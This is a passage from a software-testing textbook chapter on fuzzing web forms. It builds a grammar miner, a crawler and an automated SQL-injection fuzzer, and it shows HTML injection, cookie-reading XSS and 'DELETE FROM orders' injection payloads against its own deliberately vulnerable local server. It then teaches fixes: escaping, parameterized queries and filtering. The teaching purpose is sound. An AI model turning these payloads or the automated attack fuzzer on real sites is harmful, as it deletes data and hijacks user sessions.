grammar: Grammar = extend_grammar(self.QUERY_GRAMMAR)
grammar["<action>"] = [self.action]
query = ""
for field in self.fields:
field_symbol = new_symbol(grammar, "<" + field + ">")
field_type = self.fields[field]
if query != "":
query += "&"
query += field_symbol
if isinstance(field_type, str):
field_type_symbol = "<" + field_type + ">"
grammar[field_symbol] = [field + "=" + field_type_symbol]
if field_type_symbol not in grammar:
# Unknown type
grammar[field_type_symbol] = ["<text>"]
else:
# List of values
value_symbol = new_symbol(grammar, "<" + field + "-value>")
grammar[field_symbol] = [field + "=" + value_symbol]
grammar[value_symbol] = field_type # type: ignore
grammar["<query>"] = [query]
# Remove unused parts
for nonterminal in unreachable_nonterminals(grammar):
del grammar[nonterminal]
assert is_valid_grammar(grammar)
return grammar
```
Let us show `HTMLGrammarMiner` in action, again applied on our order form. Here is the full resulting grammar:
```
html_miner = HTMLGrammarMiner(html_text)
grammar = html_miner.mine_grammar()
grammar
```
Let us take a look into the structure of the grammar. It produces URL paths of this form:
```
grammar["<start>"]
```
Here, the `<action>` comes from the `action` attribute of the HTML form:
```
grammar["<action>"]
```
The `<query>` is composed from the individual field items:
```
grammar["<query>"]
```
Each of these fields has the form `<field-name>=<field-type>`, where `<field-type>` is already defined in the grammar:
```
grammar["<zip>"]
grammar["<terms>"]
```
These are the query URLs produced from the grammar. We see that these are similar to the ones produced from our hand-crafted grammar, except that the string values for names, email addresses, and cities are now completely random:
```
order_fuzzer = GrammarFuzzer(grammar)
[order_fuzzer.fuzz() for i in range(3)]
```
We can again feed these directly into our Web browser:
```
HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))
```
We see (one more time) that we can mine a grammar automatically from given data.
### A Fuzzer for Web Forms
To make things as convenient as possible, let us define a `WebFormFuzzer` class that does everything in one place. Given a URL, it extracts the HTML content, mines the grammar, and then produces inputs for it.
```
class WebFormFuzzer(GrammarFuzzer):
"""A Fuzzer for Web forms"""
def __init__(self, url: str, *,
grammar_miner_class: Optional[type] = None,
**grammar_fuzzer_options):
"""Constructor.
`url` - the URL of the Web form to fuzz.
`grammar_miner_class` - the class of the grammar miner
to use (default: `HTMLGrammarMiner`)
Other keyword arguments are passed to the `GrammarFuzzer` constructor
"""
if grammar_miner_class is None:
grammar_miner_class = HTMLGrammarMiner
self.grammar_miner_class = grammar_miner_class
# We first extract the HTML form and its grammar...
html_text = self.get_html(url)
grammar = self.get_grammar(html_text)
# ... and then initialize the `GrammarFuzzer` superclass with it
super().__init__(grammar, **grammar_fuzzer_options)
def get_html(self, url: str):
"""Retrieve the HTML text for the given URL `url`.
To be overloaded in subclasses."""
return requests.get(url).text
def get_grammar(self, html_text: str):
"""Obtain the grammar for the given HTML `html_text`.
To be overloaded in subclasses."""
grammar_miner = self.grammar_miner_class(html_text)
return grammar_miner.mine_grammar()
```
All it now takes to fuzz a Web form is to provide its URL:
```
web_form_fuzzer = WebFormFuzzer(httpd_url)
web_form_fuzzer.fuzz()
```
We can combine the fuzzer with a `WebRunner` as defined above to run the resulting fuzz inputs directly on our Web server:
```
web_form_runner = WebRunner(httpd_url)
web_form_fuzzer.runs(web_form_runner, 10)
```
While convenient to use, this fuzzer is still very rudimentary:
* It is limited to one form per page.
* It only supports `GET` actions (i.e., inputs encoded into the URL). A full Web form fuzzer would have to at least support `POST` actions.
* The fuzzer is built on HTML only. There is no JavaScript handling for dynamic Web pages.
Let us clear any pending messages before we get to the next section:
```
clear_httpd_messages()
```
## Crawling User Interfaces
So far, we have assumed there would be only one form to explore. A real Web server, of course, has several pages – and possibly several forms, too. We define a simple *crawler* that explores all the links that originate from one page.
Our crawler is pretty straightforward. Its main component is again a `HTMLParser` that analyzes the HTML code for links of the form
```html
<a href="<link>">
```
and saves all the links found in a list called `links`.
```
class LinkHTMLParser(HTMLParser):
"""Parse all links found in a HTML page"""
def reset(self):
super().reset()
self.links = []
def handle_starttag(self, tag, attrs):
attributes = {attr_name: attr_value for attr_name, attr_value in attrs}
if tag == "a" and "href" in attributes:
# print("Found:", tag, attributes)
self.links.append(attributes["href"])
```
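Applied to a small HTML fragment, the parser collects exactly the `href` targets. (The class definition is repeated below so the snippet runs on its own; the links are made up.)

```python
from html.parser import HTMLParser

class LinkHTMLParser(HTMLParser):
    """Parse all links found in an HTML page (definition repeated from above)"""
    def reset(self):
        super().reset()
        self.links = []

    def handle_starttag(self, tag, attrs):
        attributes = {attr_name: attr_value for attr_name, attr_value in attrs}
        if tag == "a" and "href" in attributes:
            self.links.append(attributes["href"])

link_parser = LinkHTMLParser()
link_parser.feed('<a href="/order">Order</a> <b>no link</b> <a href="/terms">Terms</a>')
assert link_parser.links == ["/order", "/terms"]
```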
The actual crawler comes as a _generator function_ `crawl()` which produces one URL after another. By default, it returns only URLs that reside on the same host; the parameter `max_pages` controls how many pages (default: 1) should be scanned. We also respect the `robots.txt` file on the remote site to check which pages we are allowed to scan.
### Excursion: Implementing a Crawler
```
from collections import deque
import urllib.robotparser
def crawl(url, max_pages: Union[int, float] = 1, same_host: bool = True):
"""Return the list of linked URLs from the given URL.
`max_pages` - the maximum number of pages accessed.
`same_host` - if True (default), stay on the same host"""
pages = deque([(url, "<param>")])
urls_seen = set()
rp = urllib.robotparser.RobotFileParser()
rp.set_url(urljoin(url, "/robots.txt"))
rp.read()
while len(pages) > 0 and max_pages > 0:
page, referrer = pages.popleft()
if not rp.can_fetch("*", page):
# Disallowed by robots.txt
continue
r = requests.get(page)
max_pages -= 1
if r.status_code != HTTPStatus.OK:
print("Error " + repr(r.status_code) + ": " + page,
"(referenced from " + referrer + ")",
file=sys.stderr)
continue
content_type = r.headers["content-type"]
if not content_type.startswith("text/html"):
continue
parser = LinkHTMLParser()
parser.feed(r.text)
for link in parser.links:
target_url = urljoin(page, link)
if same_host and urlsplit(
target_url).hostname != urlsplit(url).hostname:
# Different host
continue
if urlsplit(target_url).fragment != "":
# Ignore #fragments
continue
if target_url not in urls_seen:
pages.append((target_url, page))
urls_seen.add(target_url)
yield target_url
if page not in urls_seen:
urls_seen.add(page)
yield page
```
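The URL handling inside `crawl()` relies on `urljoin()` and `urlsplit()` from the standard library; in isolation, its same-host and fragment checks behave like this (host names made up):

```python
from urllib.parse import urljoin, urlsplit

base = "http://127.0.0.1:8800/order"

# Relative links are resolved against the current page
assert urljoin(base, "terms") == "http://127.0.0.1:8800/terms"

# Links to another host are detected by comparing host names
other = urljoin(base, "http://other.example.com/page")
assert urlsplit(other).hostname != urlsplit(base).hostname

# Pure #fragment links carry a nonempty fragment and are skipped
assert urlsplit(urljoin(base, "#top")).fragment == "top"
```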
### End of Excursion
We can run the crawler on our own server, where it will quickly return the order page and the terms and conditions page.
```
for url in crawl(httpd_url):
print_httpd_messages()
print_url(url)
```
We can also crawl over other sites, such as the home page of this project.
```
for url in crawl("https://www.fuzzingbook.org/"):
print_url(url)
```
Once we have crawled over all the links of a site, we can generate tests for all the forms we found:
```
for url in crawl(httpd_url, max_pages=float('inf')):
web_form_fuzzer = WebFormFuzzer(url)
web_form_runner = WebRunner(url)
print(web_form_fuzzer.run(web_form_runner))
```
For even better effects, one could integrate crawling and fuzzing – and also analyze the order confirmation pages for further links. We leave this to the reader as an exercise.
Let us get rid of any server messages accumulated above:
```
clear_httpd_messages()
```
## Crafting Web Attacks
Before we close the chapter, let us take a look at a special class of "uncommon" inputs that not only yield generic failures, but actually allow _attackers_ to manipulate the server at their will. We will illustrate three common attacks using our server, which (surprise) actually turns out to be vulnerable against all of them.
### HTML Injection Attacks
The first kind of attack we look at is *HTML injection*. The idea of HTML injection is to supply the Web server with _data that can also be interpreted as HTML_. If this HTML data is then displayed to users in their Web browsers, it can serve malicious purposes, although (seemingly) originating from a reputable site. If this data is also _stored_, it becomes a _persistent_ attack; the attacker does not even have to lure victims towards specific pages.
Here is an example of a (simple) HTML injection. For the `name` field, we not only use plain text, but also embed HTML tags – in this case, a link towards a malware-hosting site.
```
from Grammars import extend_grammar
ORDER_GRAMMAR_WITH_HTML_INJECTION: Grammar = extend_grammar(ORDER_GRAMMAR, {
"<name>": [cgi_encode('''
Jane Doe<p>
<strong><a href="www.lots.of.malware">Click here for cute cat pictures!</a></strong>
</p>
''')],
})
```
If we use this grammar to create inputs, the resulting URL will have all of the HTML encoded into it:
```
html_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_HTML_INJECTION)
order_with_injected_html = html_injection_fuzzer.fuzz()
order_with_injected_html
```
What happens if we send this string to our Web server? It turns out that the HTML is left in the confirmation page and shown as a link. This also happens in the log:
```
HTML(webbrowser(urljoin(httpd_url, order_with_injected_html)))
```
Since the link seemingly comes from a trusted origin, users are much more likely to follow it. The link is even persistent, as it is stored in the database:
```
print(db.execute("SELECT * FROM orders WHERE name LIKE '%<%'").fetchall())
```
This means that anyone ever querying the database (for instance, operators processing the order) will also see the link, multiplying its impact. By carefully crafting the injected HTML, one can thus expose malicious content to a large number of users – until the injected HTML is finally deleted.
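A standard defense against HTML injection is to _escape_ user-supplied data before embedding it in a page. Python's `html.escape()` (not used by our deliberately vulnerable server) turns markup characters into harmless entities:

```python
import html

injected_name = 'Jane Doe<p><a href="www.lots.of.malware">Click here!</a></p>'
escaped = html.escape(injected_name)

# The angle brackets and quotes are now entities; a browser renders
# them as text, not as a link
assert "<a " not in escaped
assert "&lt;a href=&quot;www.lots.of.malware&quot;&gt;" in escaped
```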
### Cross-Site Scripting Attacks
If one can inject HTML code into a Web page, one can also inject *JavaScript* code as part of the injected HTML. This code would then be executed as soon as the injected HTML is rendered.
This is particularly dangerous because executed JavaScript always executes in the _origin_ of the page which contains it. Therefore, an attacker can normally not force a user to run JavaScript in any origin he does not control himself. When an attacker, however, can inject his code into a vulnerable Web application, he can have the client run the code with the (trusted) Web application as origin.
In such a *cross-site scripting* (*XSS*) attack, the injected script can do a lot more than just plain HTML. For instance, the code can access sensitive page content or session cookies. If the code in question runs in the operator's browser (for instance, because an operator is reviewing the list of orders), it could retrieve any other information shown on the screen and thus steal order details for a variety of customers.
Here is a very simple example of a script injection. Whenever the name is displayed, it causes the browser to "steal" the current *session cookie* – the piece of data the browser uses to identify the user with the server. In our case, we could steal the cookie of the Jupyter session.
```
ORDER_GRAMMAR_WITH_XSS_INJECTION: Grammar = extend_grammar(ORDER_GRAMMAR, {
"<name>": [cgi_encode('Jane Doe' +
'<script>' +
'document.title = document.cookie.substring(0, 10);' +
'</script>')
],
})
xss_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_XSS_INJECTION)
order_with_injected_xss = xss_injection_fuzzer.fuzz()
order_with_injected_xss
url_with_injected_xss = urljoin(httpd_url, order_with_injected_xss)
url_with_injected_xss
HTML(webbrowser(url_with_injected_xss, mute=True))
```
The message looks as always – but if you have a look at your browser title, it should now show the first 10 characters of your "secret" notebook cookie. Instead of showing its prefix in the title, the script could also silently send the cookie to a remote server, allowing attackers to hijack your current notebook session and interact with the server on your behalf. It could also go and access and send any other data that is shown in your browser or otherwise available. It could run a *keylogger* and steal passwords and other sensitive data as it is typed in. Again, it will do so every time the compromised order with Jane Doe's name is shown in the browser and the associated script is executed.
Let us go and reset the title to a less sensitive value:
```
HTML('<script>document.title = "Jupyter"</script>')
```
### SQL Injection Attacks
Cross-site scripts have the same privileges as web pages – most notably, they cannot access or change data outside of your browser. So-called *SQL injection* targets _databases_, allowing attackers to inject commands that can read or modify data in the database, or change the purpose of the original query.
To understand how SQL injection works, let us take a look at the code that produces the SQL command to insert a new order into the database:
```python
sql_command = ("INSERT INTO orders " +
"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))
```
What happens if any of the values (say, `name`) has a value that _can also be interpreted as a SQL command?_ Then, instead of the intended `INSERT` command, we would execute the command imposed by `name`.
Let us illustrate this by an example. We set the individual values as they would be found during execution:
```
values: Dict[str, str] = {
"item": "tshirt",
"name": "Jane Doe",
"email": "j.doe@example.com",
"city": "Seattle",
"zip": "98104"
}
```
and format the string as seen above:
```
sql_command = ("INSERT INTO orders " +
"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))
sql_command
```
All fine, right? But now, we define a very "special" name that can also be interpreted as a SQL command:
```
values["name"] = "Jane', 'x', 'x', 'x'); DELETE FROM orders; -- "
sql_command = ("INSERT INTO orders " +
"VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))
sql_command
```
What happens here is that we now get a command to insert values into the database (with a few "dummy" values `x`), followed by a SQL `DELETE` command that would _delete all entries_ of the orders table. The string `-- ` starts a SQL _comment_ such that the remainder of the original query would be easily ignored. By crafting strings that can also be interpreted as SQL commands, attackers can alter or delete database data, bypass authentication mechanisms and many more.
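We can reproduce this effect in a throwaway in-memory SQLite database. (That the server runs the command via `executescript()` is an assumption here; `sqlite3`'s plain `execute()` refuses multi-statement strings.)

```python
import sqlite3

demo_db = sqlite3.connect(":memory:")
demo_db.execute("CREATE TABLE orders (item, name, email, city, zip)")
demo_db.execute("INSERT INTO orders VALUES ('drill', 'John Smith', "
                "'j_smith@example.com', 'Seattle', '98104')")

values = {
    "item": "tshirt",
    "name": "Jane', 'x', 'x', 'x'); DELETE FROM orders; -- ",
    "email": "j.doe@example.com",
    "city": "Seattle",
    "zip": "98104"
}
sql_command = ("INSERT INTO orders " +
               "VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values))

# executescript() runs every statement in the string, including the
# injected DELETE; the trailing "-- " comments out the leftover query text
demo_db.executescript(sql_command)
assert demo_db.execute("SELECT * FROM orders").fetchall() == []
```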
Is our server also vulnerable to such attacks? Of course it is. We create a special grammar such that we can set the `<name>` parameter to a string with SQL injection, just as shown above.
```
from Grammars import extend_grammar
ORDER_GRAMMAR_WITH_SQL_INJECTION = extend_grammar(ORDER_GRAMMAR, {
"<name>": [cgi_encode("Jane', 'x', 'x', 'x'); DELETE FROM orders; --")],
})
sql_injection_fuzzer = GrammarFuzzer(ORDER_GRAMMAR_WITH_SQL_INJECTION)
order_with_injected_sql = sql_injection_fuzzer.fuzz()
order_with_injected_sql
```
These are the current orders:
```
print(db.execute("SELECT * FROM orders").fetchall())
```
Let us go and send our URL with SQL injection to the server. From the log, we see that the "malicious" SQL command is formed just as sketched above, and executed, too.
```
contents = webbrowser(urljoin(httpd_url, order_with_injected_sql))
```
All orders are now gone:
```
print(db.execute("SELECT * FROM orders").fetchall())
```
This effect is also illustrated [in this very popular XKCD comic](https://xkcd.com/327/):
{width=100%}
Even if we had not been able to execute arbitrary commands, being able to compromise an orders database offers several possibilities for mischief. For instance, we could use the address and matching credit card number of an existing person to go through validation and submit an order, only to have the order then delivered to an address of our choice. We could also use SQL injection to inject HTML and JavaScript code as above, bypassing possible sanitization geared at these domains.
To avoid such effects, the remedy is to _sanitize_ all third-party inputs – no character in the input must be interpretable as plain HTML, JavaScript, or SQL. This is achieved by properly _quoting_ and _escaping_ inputs. The [exercises](#Exercises) give some instructions on what to do.
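For SQL specifically, the canonical fix is to use _parameterized queries_ instead of string formatting; the database driver then treats user input strictly as data. A sketch with `sqlite3` placeholders:

```python
import sqlite3

safe_db = sqlite3.connect(":memory:")
safe_db.execute("CREATE TABLE orders (item, name, email, city, zip)")

malicious_name = "Jane', 'x', 'x', 'x'); DELETE FROM orders; -- "

# '?' placeholders let sqlite3 quote the values itself;
# the "name" is stored verbatim and never interpreted as SQL
safe_db.execute("INSERT INTO orders VALUES (?, ?, ?, ?, ?)",
                ("tshirt", malicious_name, "j.doe@example.com",
                 "Seattle", "98104"))

rows = safe_db.execute("SELECT * FROM orders").fetchall()
assert len(rows) == 1
assert rows[0][1] == malicious_name  # stored as plain data
```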
### Leaking Internal Information
To craft the above SQL queries, we have used _insider information_ – for instance, we knew the name of the table as well as its structure. Surely, an attacker would not know this and thus not be able to run the attack, right? Unfortunately, it turns out we are leaking all of this information out to the world in the first place. The error message produced by our server reveals everything we need:
```
answer = webbrowser(urljoin(httpd_url, "/order"), mute=True)
HTML(answer)
```
The best way to avoid information leakage through failures is of course not to fail in the first place. But if you fail, _make it hard for the attacker to establish a link between the attack and the failure._ In particular,
* Do not produce "internal error" messages (and certainly not ones with internal information).
* Do not become unresponsive; just go back to the home page and ask the user to supply correct data.
One more time, the [exercises](#Exercises) give some instructions on how to fix the server.
If you can manipulate the server not only to alter information, but also to _retrieve_ information, you can learn about table names and structure by accessing special _tables_ (also called a *data dictionary*) in which database servers store their metadata. In the MySQL server, for instance, the special table `information_schema` holds metadata such as the names of databases and tables, data types of columns, or access privileges.
## Fully Automatic Web Attacks
So far, we have demonstrated the above attacks using our manually written order grammar. However, the attacks also work for generated grammars. We extend `HTMLGrammarMiner` by adding a number of common SQL injection attacks:
```
class SQLInjectionGrammarMiner(HTMLGrammarMiner):
"""Demonstration of an automatic SQL Injection attack grammar miner"""
# Some common attack schemes
ATTACKS: List[str] = [
"<string>' <sql-values>); <sql-payload>; <sql-comment>",
"<string>' <sql-comment>",
"' OR 1=1<sql-comment>'",
"<number> OR 1=1",
]
def __init__(self, html_text: str, sql_payload: str):
"""Constructor.
`html_text` - the HTML form to be attacked
`sql_payload` - the SQL command to be executed
"""
super().__init__(html_text)
self.QUERY_GRAMMAR = extend_grammar(self.QUERY_GRAMMAR, {
"<text>": ["<string>", "<sql-injection-attack>"],
"<number>": ["<digits>", "<sql-injection-attack>"],
"<checkbox>": ["<_checkbox>", "<sql-injection-attack>"],
"<email>": ["<_email>", "<sql-injection-attack>"],
"<sql-injection-attack>": [
cgi_encode(attack, "<->") for attack in self.ATTACKS
],
"<sql-values>": ["", cgi_encode("<sql-values>, '<string>'", "<->")],
"<sql-payload>": [cgi_encode(sql_payload)],
"<sql-comment>": ["--", "#"],
})
html_miner = SQLInjectionGrammarMiner(
html_text, sql_payload="DROP TABLE orders")
grammar = html_miner.mine_grammar()
grammar
grammar["<text>"]
```
We see that several fields now are tested for vulnerabilities:
```
sql_fuzzer = GrammarFuzzer(grammar)
sql_fuzzer.fuzz()
print(db.execute("SELECT * FROM orders").fetchall())
contents = webbrowser(urljoin(httpd_url,
"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))
def orders_db_is_empty():
"""Return True if the orders database is empty (= we have been successful)"""
try:
entries = db.execute("SELECT * FROM orders").fetchall()
except sqlite3.OperationalError:
return True
return len(entries) == 0
orders_db_is_empty()
```
We create a `SQLInjectionFuzzer` that does it all automatically.
```
class SQLInjectionFuzzer(WebFormFuzzer):
"""Simple demonstrator of a SQL Injection Fuzzer"""
def __init__(self, url: str, sql_payload : str ="", *,
sql_injection_grammar_miner_class: Optional[type] = None,
**kwargs):
"""Constructor.
`url` - the Web page (with a form) to retrieve
`sql_payload` - the SQL command to execute
`sql_injection_grammar_miner_class` - the miner to be used
(default: SQLInjectionGrammarMiner)
Other keyword arguments are passed to `WebFormFuzzer`.
"""
self.sql_payload = sql_payload
if sql_injection_grammar_miner_class is None:
sql_injection_grammar_miner_class = SQLInjectionGrammarMiner
self.sql_injection_grammar_miner_class = sql_injection_grammar_miner_class
super().__init__(url, **kwargs)
def get_grammar(self, html_text):
"""Obtain a grammar with SQL injection commands"""
grammar_miner = self.sql_injection_grammar_miner_class(
html_text, sql_payload=self.sql_payload)
return grammar_miner.mine_grammar()
sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
web_runner = WebRunner(httpd_url)
trials = 1
while True:
sql_fuzzer.run(web_runner)
if orders_db_is_empty():
break
trials += 1
trials
```
Our attack was successful! After less than a second of testing, our database is empty:
```
orders_db_is_empty()
```
Again, note the level of possible automation: We can
* Crawl the Web pages of a host for possible forms
* Automatically identify form fields and possible values
* Inject SQL (or HTML, or JavaScript) into any of these fields
and all of this fully automatically, not needing anything but the URL of the site.
The bad news is that with a toolset like the one above, anyone can attack web sites. The even worse news is that such penetration attempts take place every day, on every web site. The good news, though, is that after reading this chapter, you now have an idea of how Web servers are attacked every day – and what you, as a Web server maintainer, can and should do to prevent this.
## Synopsis
This chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it.
### Fuzzing Web Forms
`WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. Support is limited to GET forms and a subset of HTML form elements.
Here's the grammar extracted for our vulnerable Web server:
```
web_form_fuzzer = WebFormFuzzer(httpd_url)
web_form_fuzzer.grammar['<start>']
web_form_fuzzer.grammar['<action>']
web_form_fuzzer.grammar['<query>']
```
Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form.
```
web_form_fuzzer.fuzz()
```
Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values.
Internally, `WebFormFuzzer` builds on a helper class named `HTMLGrammarMiner`; you can extend its functionality to include more features.
### SQL Injection Attacks
`SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server. Otherwise, it is used like `WebFormFuzzer`:
```
sql_fuzzer = SQLInjectionFuzzer(httpd_url, "DELETE FROM orders")
sql_fuzzer.fuzz()
```
As you can see, the path to be retrieved contains the payload encoded into one of the form field values.
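To illustrate how a payload ends up percent-encoded in a form field value, here is a minimal stand-alone sketch; the standard library's `urllib.parse.quote_plus()` stands in for the book's `cgi_encode()`, and the payload string is only an example:

```python
from urllib.parse import quote_plus

# Example payload only; quote_plus() stands in for the book's cgi_encode()
payload = "Robert', 'x'); DELETE FROM orders; --"
url = "/order?item=tshirt&name=" + quote_plus(payload)
print(url)
```

Spaces become `+` and special characters become `%XX` escapes, so the SQL payload travels unharmed inside an ordinary-looking query string.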
Internally, `SQLInjectionFuzzer` builds on a helper class named `SQLInjectionGrammarMiner`; you can extend its functionality to include more features.
`SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it.
```
# ignore
from ClassDiagram import display_class_hierarchy
from Fuzzer import Fuzzer, Runner
from Grammars import Grammar, Expansion
from GrammarFuzzer import GrammarFuzzer, DerivationTree
# ignore
display_class_hierarchy([WebFormFuzzer, SQLInjectionFuzzer, WebRunner,
HTMLGrammarMiner, SQLInjectionGrammarMiner],
public_methods=[
Fuzzer.__init__,
Fuzzer.fuzz,
Fuzzer.run,
Fuzzer.runs,
Runner.__init__,
Runner.run,
WebRunner.__init__,
WebRunner.run,
GrammarFuzzer.__init__,
GrammarFuzzer.fuzz,
GrammarFuzzer.fuzz_tree,
WebFormFuzzer.__init__,
SQLInjectionFuzzer.__init__,
HTMLGrammarMiner.__init__,
SQLInjectionGrammarMiner.__init__,
],
types={
'DerivationTree': DerivationTree,
'Expansion': Expansion,
'Grammar': Grammar
},
project='fuzzingbook')
```
## Lessons Learned
* User Interfaces (in the Web and elsewhere) should be tested with _expected_ and _unexpected_ values.
* One can _mine grammars from user interfaces_, allowing for their widespread testing.
* Consistent _sanitizing_ of inputs prevents common attacks such as code and SQL injection.
* Do not attempt to write a Web server yourself, as you are likely to repeat all the mistakes of others.
We're done, so we can clean up:
```
clear_httpd_messages()
httpd_process.terminate()
```
## Next Steps
From here, the next step is [GUI Fuzzing](GUIFuzzer.ipynb), going from HTML- and Web-based user interfaces to generic user interfaces (including JavaScript and mobile user interfaces).
If you are interested in security testing, do not miss our [chapter on information flow](InformationFlow.ipynb), showing how to systematically detect information leaks; this also addresses the issue of SQL Injection attacks.
## Background
The [Wikipedia pages on Web application security](https://en.wikipedia.org/wiki/Web_application_security) are a mandatory read for anyone building, maintaining, or testing Web applications. In 2012, cross-site scripting and SQL injection, as discussed in this chapter, made up more than 50% of Web application vulnerabilities.
The [Wikipedia page on penetration testing](https://en.wikipedia.org/wiki/Penetration_test) provides a comprehensive overview on the history of penetration testing, as well as collections of vulnerabilities.
The [OWASP Zed Attack Proxy Project](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) (ZAP) is an open source Web site security scanner including several of the features discussed above, and many many more.
## Exercises
### Exercise 1: Fix the Server
Create a `BetterHTTPRequestHandler` class that fixes the several issues of `SimpleHTTPRequestHandler`:
#### Part 1: Silent Failures
Set up the server such that it does not reveal internal information – in particular, tracebacks and HTTP status codes.
**Solution.** We define a better message that does not reveal tracebacks:
```
BETTER_HTML_INTERNAL_SERVER_ERROR = \
HTML_INTERNAL_SERVER_ERROR.replace("<pre>{error_message}</pre>", "")
HTML(BETTER_HTML_INTERNAL_SERVER_ERROR)
```
We have the `internal_server_error()` method return `HTTPStatus.OK` to make it harder for machines to find out that something went wrong:
```
class BetterHTTPRequestHandler(SimpleHTTPRequestHandler):
def internal_server_error(self):
# Note: No INTERNAL_SERVER_ERROR status
self.send_response(HTTPStatus.OK, "Internal Error")
self.send_header("Content-type", "text/html")
self.end_headers()
exc = traceback.format_exc()
self.log_message("%s", exc.strip())
# No traceback or other information
message = BETTER_HTML_INTERNAL_SERVER_ERROR
self.wfile.write(message.encode("utf8"))
```
#### Part 2: Sanitized HTML
Set up the server such that it is not vulnerable against HTML and JavaScript injection attacks, notably by using methods such as `html.escape()` to escape special characters when showing them.
```
import html
```
**Solution.** We pass all values read through `html.escape()` before showing them on the screen; this will properly encode `<`, `&`, and `>` characters.
```
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
def send_order_received(self, values):
sanitized_values = {}
for field in values:
sanitized_values[field] = html.escape(values[field])
sanitized_values["item_name"] = html.escape(
FUZZINGBOOK_SWAG[values["item"]])
confirmation = HTML_ORDER_RECEIVED.format(
**sanitized_values).encode("utf8")
self.send_response(HTTPStatus.OK, "Order received")
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(confirmation)
```
#### Part 3: Sanitized SQL
Set up the server such that it is not vulnerable against SQL injection attacks, notably by using _SQL parameter substitution._
**Solution.** We use SQL parameter substitution to avoid interpretation of inputs as SQL commands. Also, we use `execute()` rather than `executescript()` to avoid processing of multiple commands.
```
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
def store_order(self, values):
db = sqlite3.connect(ORDERS_DB)
db.execute("INSERT INTO orders VALUES (?, ?, ?, ?, ?)",
(values['item'], values['name'], values['email'], values['city'], values['zip']))
db.commit()
```
One could also argue not to store "dangerous" characters in the first place. But then, there will always be names or addresses containing special characters, which all need to be handled.
#### Part 4: A Robust Server
Set up the server such that it does not crash with invalid or missing fields.
**Solution.** We set up a simple check at the beginning of `handle_order()` that checks whether all required fields are present. If not, we return to the order form.
```
class BetterHTTPRequestHandler(BetterHTTPRequestHandler):
REQUIRED_FIELDS = ['item', 'name', 'email', 'city', 'zip']
def handle_order(self):
values = self.get_field_values()
for required_field in self.REQUIRED_FIELDS:
if required_field not in values:
self.send_order_form()
return
self.store_order(values)
self.send_order_received(values)
```
This could easily be extended to check for valid (at least non-empty) values. Also, the order form should be pre-filled with the originally submitted values, and come with a helpful error message.
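The non-empty check described above could be sketched as follows; this is an assumption-laden sketch rather than the chapter's code, with field names taken from the order form:

```python
# Sketch only: validate that required fields are present and non-empty
REQUIRED_FIELDS = ['item', 'name', 'email', 'city', 'zip']

def fields_valid(values, required=REQUIRED_FIELDS):
    """Return True if every required field is present and non-empty."""
    return all(values.get(field, "").strip() for field in required)

print(fields_valid({'item': 'tshirt', 'name': 'Jane Doe',
                    'email': 'doe@example.com', 'city': 'Seattle', 'zip': '98104'}))
print(fields_valid({'item': 'tshirt', 'name': ''}))
```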
#### Part 5: Test it!
Test your improved server to check whether your measures have been successful.
**Solution.** Here we go:
```
httpd_process, httpd_url = start_httpd(BetterHTTPRequestHandler)
print_url(httpd_url)
print_httpd_messages()
```
We test standard behavior:
```
standard_order = "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"
contents = webbrowser(httpd_url + standard_order)
HTML(contents)
assert contents.find("Thank you") > 0
```
We test for incomplete URLs:
```
bad_order = "/order?item="
contents = webbrowser(httpd_url + bad_order)
HTML(contents)
assert contents.find("Order Form") > 0
```
We test for HTML (and JavaScript) injection:
```
injection_order = "/order?item=tshirt&name=Jane+Doe" + cgi_encode("<script></script>") + \
"&email=doe%40example.com&city=Seattle&zip=98104"
contents = webbrowser(httpd_url + injection_order)
HTML(contents)
assert contents.find("Thank you") > 0
assert contents.find("<script>") < 0
assert contents.find("&lt;script&gt;") > 0
```
We test for SQL injection:
```
sql_order = "/order?item=tshirt&name=" + \
cgi_encode("Robert', 'x', 'x', 'x'); DELETE FROM orders; --") + \
"&email=doe%40example.com&city=Seattle&zip=98104"
contents = webbrowser(httpd_url + sql_order)
HTML(contents)
```
(Okay, so obviously we can now handle the weirdest of names; still, Robert should consider changing his name...)
```
assert contents.find("DELETE FROM") > 0
assert not orders_db_is_empty()
```
That's it – we're done!
```
httpd_process.terminate()
if os.path.exists(ORDERS_DB):
os.remove(ORDERS_DB)
```
### Exercise 2: Protect the Server
Assume that it is not possible for you to alter the server code. Create a _filter_ that is run on all URLs before they are passed to the server.
#### Part 1: A Blacklisting Filter
Set up a filter function `blacklist(url)` that returns `False` for URLs that should not reach the server. Check the URL for whether it contains HTML, JavaScript, or SQL fragments.
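As a starting point, here is a hedged sketch of such a filter; the fragment list is illustrative and deliberately incomplete, and real attackers will find ways around any blacklist:

```python
import re
from urllib.parse import unquote_plus

# Illustrative fragments only; a real blacklist would need far more entries
BLACKLIST_PATTERNS = [
    r"<script",                           # JavaScript injection
    r"--", r";",                          # SQL comment / statement separators
    r"\b(DROP|DELETE|INSERT|UPDATE)\b",   # common SQL keywords
]

def blacklist(url: str) -> bool:
    """Return False if the URL should not reach the server."""
    decoded = unquote_plus(url)
    return not any(re.search(pattern, decoded, re.IGNORECASE)
                   for pattern in BLACKLIST_PATTERNS)

print(blacklist("/order?item=tshirt&name=Jane+Doe"))
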